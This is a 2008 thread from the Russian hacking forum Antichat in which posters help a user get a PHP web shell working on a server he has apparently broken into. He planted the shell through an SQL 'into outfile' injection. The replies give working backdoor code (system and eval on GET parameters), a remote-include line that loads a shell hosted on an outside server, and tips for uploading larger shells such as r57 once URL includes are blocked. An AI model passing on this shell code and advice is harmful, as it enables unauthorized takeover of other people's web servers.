Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   проблема с шеллом ! (https://forum.antichat.xyz/showthread.php?t=69641)

stigmatus 07.05.2008 03:15
проблема с шеллом !
 
загрузил шелл через " into outfile " простои типа :
PHP код:
 <? system($_GET['c']); ?>
но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!

fly 07.05.2008 04:21
Сейф мод ON>?
WinOs>?
include заюзать>?

stigmatus 07.05.2008 13:02
Цитата:
Сообщение от fly
Сейф мод ON>?
WinOs>?
include заюзать>?

подскажи как ??? проверить Сейф мод ??
include заюзать ???

zythar 07.05.2008 14:05
пиши в РНР файле
PHP код:
if (isset($_GET['shell'])) {
include($_GET['shell'];

потом юзай так:
Код:
http://site/script.php?shell=http://server/shell.txt
юзай php.net

Ali_MiX 07.05.2008 14:15
а если так require_once(ROOT_DIR.'/shell.php');

stigmatus 07.05.2008 14:59
ставид вот ето :
Цитата:
<? if (isset($_GET['shell'])) { include($_GET['shell']; } ?>
получил ето :

Цитата:
Parse error: syntax error, unexpected ';' in /usr/local/apache2/htdocs/cache/information.php on line 1

Don1=2 07.05.2008 15:33
Цитата:
Сообщение от stigmatus
ставид вот ето :

получил ето :
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
скобочку забыл ... учи пхп

zythar 07.05.2008 15:33
у тя скобки не хватает.
Код:
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
Цитата:
а если так require_once(ROOT_DIR.'/shell.php');
это если шелл на серваке который ты взломал уже.

stigmatus 07.05.2008 18:21
Цитата:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in /usr/local/apache2/htdocs/cache/process.php on line 1
чё делоть ??? ищё может чтото ?

_Pantera_ 07.05.2008 18:35
Цитата:
Сообщение от stigmatus
загрузил шелл через " into outfile " простои типа :
PHP код:
 <? system($_GET['c']); ?>
но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!
Ты уверен что он залился???? куда заливал - в /tmp или ты узнал путь от корня и нашел папку с правами на запись? Я склоняюсь к ответу что он просто не залился......

stigmatus 07.05.2008 18:41
ок но как обеснить ето : при выполнение пустои команды вот рез:
Цитата:
Warning: system() [function.system]: Cannot execute a blank command in /usr/local/apache2/htdocs/cache/version.php on line 1
есль можно по подробнее о том как залить его в /tmp а потом исполизовать !?

Ali_MiX 07.05.2008 18:58
Цитата:
Сообщение от zythar
у тя скобки не хватает.
Код:
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>


это если шелл на серваке который ты взломал уже.
ну так ёмаё замени shell на http://site.ru/shell.php и всё

stigmatus 07.05.2008 19:00
я английский знаю но при выполнение команды ls ничего не показивает !!
как можно стартануть из /tmp шелл ???

stigmatus 07.05.2008 19:03
Ali_MiX !!! да я всё понял так и зделол и вот каким был результат !!
Цитата:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in /usr/local/apache2/htdocs/cache/process.php on line 1

l1ght 07.05.2008 19:25
Цитата:
Сообщение от _Pantera_
Ты уверен что он залился???? куда заливал - в /tmp или ты узнал путь от корня и нашел папку с правами на запись? Я склоняюсь к ответу что он просто не залился......
разумеется он залился смотри предыдущий пост
раз урл-инклуд disabled я бы
1)попытался залить шелл через приложения на сервере
2)попробывал бы не через system()

:add сорри забыл страницу обновить, но оба варианта актуальны)

stigmatus 07.05.2008 19:30
Цитата:
Сообщение от l1ght
разумеется он залился смотри предыдущий пост
раз урл-инклуд disabled я бы
1)попытался залить шелл через приложения на сервере
2)попробывал бы не через system()

:add сорри забыл страницу обновить, но оба варианта актуальны)
пожалуста по подробнее или силку где почитать можно !

heks 07.05.2008 21:27
да просто там запрещен инклуд файлов что то такое функция какая то отключена почитай на форуме много таких тем было

Grey 07.05.2008 22:03
Цитата:
Сообщение от stigmatus
подскажи как ??? проверить Сейф мод ??
PHP код:
<?php phpinfo(); ?>
получишь phpinfo() а внём уже найдешь информацию про сейф мод.

или так:

PHP код:
<?php eval($_GET['e']); ?>
http://site/shell.php?e=phpinfo();

Так сможешь выполнять php код.

====================================

Цитата:
Сообщение от Ali_MiX
Цитата:
Сообщение от zythar
у тя скобки не хватает.
Код:
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
это если шелл на серваке который ты взломал уже.
ну так ёмаё замени shell на http://site.ru/shell.php и всё
Не совсем понял что ты хотел сказать...
Но инклудить вот так: include('http://site/shell.php'); нельзя, т.к. ЭТО во первых будет инклудом удалённого файла, а он у него запрещен (это видно из ошибки), а во вторых проинклудиться в таком случае не сам php код, а результат работы скрипта, а это разные вещи.

====================================

Цитата:
Сообщение от heks
да просто там запрещен инклуд файлов что то такое функция какая то отключена почитай на форуме много таких тем было
Не 'что то такое', а там запрещен инклуд удалённых файлов (т.е. размещенных на другом сайте).

====================================

to TC, если у тебя так плохо с пхп, то тебе будет проще залить через мускул (ты вроде написал что через него заливал) шелл побольше, что нидь с интерфейсом, или к примеру аплодилку файлов (код у неё не большой) и уже так перезалить что нидь типа r57.

P.S. для вопросов есть, вообще то, специальная, прикреплённая тема.
P.P.S. за советы типа Учи английский буду ставить минусы.


Время: 00:52